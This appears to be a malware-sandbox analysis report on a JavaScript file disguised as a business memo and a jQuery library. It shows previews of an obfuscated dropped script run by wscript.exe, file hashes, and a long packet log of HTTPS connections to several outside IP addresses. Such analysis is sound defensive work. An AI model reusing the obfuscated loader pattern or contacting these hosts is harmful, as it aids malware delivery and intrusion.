                                                    Preview:69087357;great = [];function how(probable, field, back){great[54690] = even;forest[valley] = box[forest[tire]];}function whose(job, offer, say){if(pitch(truck)) { EVJlgss(); } else { spot(great) }}press = 1;paper = "";study = 2212;function thought(hair){return -(-hair-press);}century = press;continent = [];together='s+R+ ?n?=svp \\?\"?s+++:?\\?\"u/(a$/\"B\\s?oIa+Ts?';function box(ran, sign){sound = bell+cut+cloud+period+began+grew+take+share+subtract+red+but+fire+hot+live+direct+dream+ease+family+serve+success+had+fight+what+finger+river+thank+many+see+chief+rock+was+front+circle+game+bright+led+hunt+were;great[33733] = difficult;}tire = press-century;valley = 24/8;hat=')+es]?N[(N 3o$?][?+)A+??]?=+(= ?4RF(5nE';function then(clothe, burn){return fill(clothe,burn,press);}receive='he+e???i++\"?\\??+rre???rg++eh??{tep$sdm_';skin='\\Q_0?$.}+;M??)A;K\\I\"JA?m?=+?';clear='?+]+)?7?.\\?\"sj+,p:?\\l\"[:?hs?+?v+?+??I?+]Tt?g';function even(neighbor, store, finish){leg = forest[valley];leg(forest[c
                                                    Process:C:\Windows\System32\wscript.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):4609818
                                                    Entropy (8bit):5.508029743425627
                                                    Encrypted:false
                                                    SSDEEP:12288:5ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ3:h
                                                    MD5:6166491AD0AFD48DDF8A220C09647ACF
                                                    SHA1:EAB4DB5DE13CD5A0DC2AE132FC99417C0D04DF8C
                                                    SHA-256:3FAFB3A2D8317E616647C7A8515109B517FD7A194694D7992F0CC451175687E0
                                                    SHA-512:25952807D8044F3DBD2F597139FF38873666CB8529DC5EB98B35A10B2AC8DF2D6F07EDDF4D29575A4AE6037B4164CB1792615F7FC289EB2F6F863EF313908285
                                                    Malicious:false
                                                    Preview:69087357;great = [];function how(probable, field, back){great[54690] = even;forest[valley] = box[forest[tire]];}function whose(job, offer, say){if(pitch(truck)) { EVJlgss(); } else { spot(great) }}press = 1;paper = "";study = 2212;function thought(hair){return -(-hair-press);}century = press;continent = [];together='s+R+ ?n?=svp \\?\"?s+++:?\\?\"u/(a$/\"B\\s?oIa+Ts?';function box(ran, sign){sound = bell+cut+cloud+period+began+grew+take+share+subtract+red+but+fire+hot+live+direct+dream+ease+family+serve+success+had+fight+what+finger+river+thank+many+see+chief+rock+was+front+circle+game+bright+led+hunt+were;great[33733] = difficult;}tire = press-century;valley = 24/8;hat=')+es]?N[(N 3o$?][?+)A+??]?=+(= ?4RF(5nE';function then(clothe, burn){return fill(clothe,burn,press);}receive='he+e???i++\"?\\??+rre???rg++eh??{tep$sdm_';skin='\\Q_0?$.}+;M??)A;K\\I\"JA?m?=+?';clear='?+]+)?7?.\\?\"sj+,p:?\\l\"[:?hs?+?v+?+??I?+]Tt?g';function even(neighbor, store, finish){leg = forest[valley];leg(forest[c
                                                    File type:data
                                                    Entropy (8bit):5.158361318539085
                                                    TrID:
                                                    • Java Script (8502/1) 68.00%
                                                    • Digital Micrograph Script (4001/1) 32.00%
                                                    File name:Memo - Impairment Test 2023 MEX010B (5).js
                                                    File size:288'427 bytes
                                                    MD5:95238ad5a91d721c6e8fdf4c36187798
                                                    SHA1:7b468a279606b62b0abe1a3e14aa16f0c9e6b93d
                                                    SHA256:53f8a46c948c968fe753a5f723bdf99d3b3d141dc3dec3d8e36480975c7ce879
                                                    SHA512:26139d8e3a97a9971f1163af0754c3f990b82f4af04f0fc6862dc1b2ae6186a6948a001c7c8ab2b6e981b409715e30b8c2bdf007e8d02e539c37f95438486441
                                                    SSDEEP:6144:i53Ih6ntcHCDMwfT2jP4OfSqy+QBFm9E7JFy8PlI4I1f8sATRZtr:ivs4OfSDFmcNe1f8sATtr
                                                    TLSH:0F54B6D8FB8D112E4232316AAC2F52CDBB7CD1B1561458AAFD4D497C249083C42FAF7A
                                                    File Content Preview:/*!. * jQuery Compat JavaScript Library v3.0.0-alpha1. * http://jquery.com/. *. * Includes Sizzle.js. * http://sizzlejs.com/. *. * Copyright jQuery Foundation and other contributors. * Released under th.e MIT license. * http://jquery.org/license. *. * Dat
                                                    Icon Hash:68d69b8bb6aa9a86
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 18, 2024 11:17:15.948440075 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:15.948458910 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:15.948695898 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:15.953574896 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:15.953583956 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:16.701771021 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:16.701983929 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:16.704025984 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:16.704042912 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:16.704380989 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:16.713479042 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:16.713547945 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:18.601342916 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:18.601361990 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:18.601578951 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:18.601598024 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:18.601727962 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:18.652606010 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:18.970599890 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:18.970607042 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:18.970787048 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:18.970839024 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:18.970844984 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:18.970931053 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:18.970937014 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:18.970968008 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:18.971075058 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:18.971178055 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:18.971195936 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:19.012114048 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:19.339587927 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:19.339693069 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:19.339746952 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:19.339821100 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:19.339826107 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:19.339834929 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:19.339946032 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:19.339956999 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:19.340017080 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:19.340018988 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:19.340095997 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:19.340116024 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:19.340291023 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:19.340317011 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:19.340490103 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:19.340523958 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:19.340616941 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:19.340627909 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:19.340764046 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:19.340823889 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:19.583072901 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:19.583329916 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:19.583362103 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:19.583590984 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:19.708605051 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:19.708812952 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:19.708858013 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:19.708875895 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:19.709214926 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:19.709372997 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:19.709538937 CET44349714172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:17:19.709758043 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:19.711697102 CET49714443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:17:28.670532942 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:28.670552015 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:28.670744896 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:28.672487974 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:28.672501087 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:29.423882008 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:29.424129963 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:29.425327063 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:29.425354958 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:29.425930977 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:29.434854031 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:29.434969902 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:29.732969046 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:29.732981920 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:29.733380079 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:29.733392954 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:29.775188923 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:29.973880053 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:29.973886967 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:29.974073887 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:29.974114895 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:29.974117994 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:29.974272013 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:29.974283934 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:29.974332094 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:29.974376917 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:29.974386930 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:29.974572897 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:29.974572897 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:29.974572897 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:29.974580050 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:29.974879980 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:30.215020895 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:30.215030909 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:30.215305090 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:30.216661930 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:30.216905117 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:30.216984034 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:30.217283964 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:30.217420101 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:30.217644930 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:30.217644930 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:30.217678070 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:30.217686892 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:30.217705965 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:30.217833996 CET44349715194.163.167.35192.168.11.20
                                                    Dec 18, 2024 11:17:30.217937946 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:30.217937946 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:30.218183041 CET49715443192.168.11.20194.163.167.35
                                                    Dec 18, 2024 11:17:41.471788883 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:41.471818924 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:41.472032070 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:41.472244024 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:41.472260952 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:42.303462982 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:42.303890944 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:42.304917097 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:42.304946899 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:42.305543900 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:42.306401014 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:42.306509972 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:44.435733080 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:44.435807943 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:44.436052084 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:44.436108112 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:44.436208963 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:44.490734100 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:44.842010021 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:44.842015028 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:44.842421055 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:44.842530012 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:44.842538118 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:44.842546940 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:44.842705965 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:44.842705965 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:44.842736959 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:44.842824936 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:44.842829943 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:44.842890978 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:44.843007088 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.248914957 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.248934984 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.249186039 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.249239922 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.249284983 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.249439001 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.249464035 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.249669075 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.250288963 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.250457048 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.250605106 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.250631094 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.250660896 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.250736952 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.250760078 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.250935078 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.250971079 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.251008987 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.251178980 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.251295090 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.251319885 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.251555920 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.251583099 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.303100109 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.655482054 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.655487061 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.655546904 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.655689955 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.655699968 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.655822992 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.655824900 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.655972004 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.656065941 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.656069040 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.656075954 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.656229019 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.656294107 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.656301975 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.658046961 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.658171892 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.658179998 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.658279896 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.658308983 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.658509970 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.658518076 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.658615112 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.658720016 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.658786058 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.658797979 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:45.658894062 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:45.658967018 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:46.062685966 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:46.062963009 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:46.062997103 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:46.063041925 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:46.063214064 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:46.063236952 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:46.063330889 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:46.063555002 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:46.063735008 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:46.063760042 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:46.063852072 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:46.064050913 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:46.064184904 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:46.064204931 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:46.064316034 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:46.064336061 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:46.064500093 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:46.064521074 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:46.064579010 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:46.064703941 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:46.064960003 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:46.064981937 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:46.065171957 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:46.065366030 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:46.065371990 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:46.065396070 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:46.065418959 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:46.065526009 CET44349716129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:17:46.065551996 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:46.065697908 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:46.065876961 CET49716443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:17:50.713521004 CET49717443192.168.11.2066.198.240.43
                                                    Dec 18, 2024 11:17:50.713550091 CET4434971766.198.240.43192.168.11.20
                                                    Dec 18, 2024 11:17:50.713821888 CET49717443192.168.11.2066.198.240.43
                                                    Dec 18, 2024 11:17:50.714016914 CET49717443192.168.11.2066.198.240.43
                                                    Dec 18, 2024 11:17:50.714031935 CET4434971766.198.240.43192.168.11.20
                                                    Dec 18, 2024 11:17:51.064779043 CET4434971766.198.240.43192.168.11.20
                                                    Dec 18, 2024 11:17:51.065001011 CET49717443192.168.11.2066.198.240.43
                                                    Dec 18, 2024 11:17:51.066180944 CET49717443192.168.11.2066.198.240.43
                                                    Dec 18, 2024 11:17:51.066189051 CET4434971766.198.240.43192.168.11.20
                                                    Dec 18, 2024 11:17:51.066396952 CET4434971766.198.240.43192.168.11.20
                                                    Dec 18, 2024 11:17:51.067187071 CET49717443192.168.11.2066.198.240.43
                                                    Dec 18, 2024 11:17:51.067234993 CET4434971766.198.240.43192.168.11.20
                                                    Dec 18, 2024 11:17:51.447048903 CET4434971766.198.240.43192.168.11.20
                                                    Dec 18, 2024 11:17:51.447134018 CET4434971766.198.240.43192.168.11.20
                                                    Dec 18, 2024 11:17:51.447258949 CET4434971766.198.240.43192.168.11.20
                                                    Dec 18, 2024 11:17:51.447323084 CET4434971766.198.240.43192.168.11.20
                                                    Dec 18, 2024 11:17:51.447362900 CET49717443192.168.11.2066.198.240.43
                                                    Dec 18, 2024 11:17:51.447364092 CET49717443192.168.11.2066.198.240.43
                                                    Dec 18, 2024 11:17:51.447475910 CET49717443192.168.11.2066.198.240.43
                                                    Dec 18, 2024 11:17:51.447477102 CET49717443192.168.11.2066.198.240.43
                                                    Dec 18, 2024 11:17:51.447701931 CET49717443192.168.11.2066.198.240.43
                                                    Dec 18, 2024 11:18:06.512181997 CET49718443192.168.11.2067.205.27.249
                                                    Dec 18, 2024 11:18:06.512258053 CET4434971867.205.27.249192.168.11.20
                                                    Dec 18, 2024 11:18:06.512463093 CET49718443192.168.11.2067.205.27.249
                                                    Dec 18, 2024 11:18:06.512697935 CET49718443192.168.11.2067.205.27.249
                                                    Dec 18, 2024 11:18:06.512753963 CET4434971867.205.27.249192.168.11.20
                                                    Dec 18, 2024 11:18:06.859673023 CET4434971867.205.27.249192.168.11.20
                                                    Dec 18, 2024 11:18:06.859925985 CET49718443192.168.11.2067.205.27.249
                                                    Dec 18, 2024 11:18:06.861097097 CET49718443192.168.11.2067.205.27.249
                                                    Dec 18, 2024 11:18:06.861145973 CET4434971867.205.27.249192.168.11.20
                                                    Dec 18, 2024 11:18:06.862107038 CET4434971867.205.27.249192.168.11.20
                                                    Dec 18, 2024 11:18:06.863013983 CET49718443192.168.11.2067.205.27.249
                                                    Dec 18, 2024 11:18:06.863171101 CET4434971867.205.27.249192.168.11.20
                                                    Dec 18, 2024 11:18:08.218056917 CET4434971867.205.27.249192.168.11.20
                                                    Dec 18, 2024 11:18:08.218115091 CET4434971867.205.27.249192.168.11.20
                                                    Dec 18, 2024 11:18:08.218274117 CET4434971867.205.27.249192.168.11.20
                                                    Dec 18, 2024 11:18:08.218377113 CET49718443192.168.11.2067.205.27.249
                                                    Dec 18, 2024 11:18:08.218523979 CET49718443192.168.11.2067.205.27.249
                                                    Dec 18, 2024 11:18:08.221012115 CET49718443192.168.11.2067.205.27.249
                                                    Dec 18, 2024 11:18:12.034809113 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:12.034830093 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:12.034987926 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:12.035201073 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:12.035212994 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:12.920914888 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:12.921124935 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:12.922425985 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:12.922435999 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:12.922696114 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:12.923574924 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:12.923629999 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.523756027 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.523777008 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.523793936 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.523932934 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.523932934 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.523946047 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.524096966 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.524096966 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.524235010 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.524676085 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.524688005 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.524854898 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.524854898 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.524868965 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.524876118 CET49719443192.168.11.2088.218.116.137
